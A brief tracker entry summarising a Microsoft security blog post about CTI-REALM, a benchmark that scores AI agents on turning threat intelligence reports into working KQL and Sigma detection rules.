CTI-REALM: A new benchmark for end-to-end detection rule generation with AI agents
Summary
CTI-REALM is Microsoft's open-source benchmark that evaluates AI agents on their ability to perform end-to-end detection engineering, which means taking cyber threat intelligence reports and turning them into validated detection rules (KQL queries and Sigma rules) that can actually catch attacks in real environments. Unlike existing benchmarks that only test whether AI can answer trivia about threats, CTI-REALM tests whether AI agents can do what security analysts actually do: read threat reports, explore system data, write and refine queries, and produce working detection logic scored against real attack telemetry across Linux, Azure Kubernetes Service, and Azure cloud platforms.
Classification
Affected Vendors
Related Issues
Original source: https://www.microsoft.com/en-us/security/blog/2026/03/20/cti-realm-a-new-benchmark-for-end-to-end-detection-rule-generation-with-ai-agents/
First tracked: March 20, 2026 at 02:00 PM
Classified by LLM (prompt v3) · confidence: 85%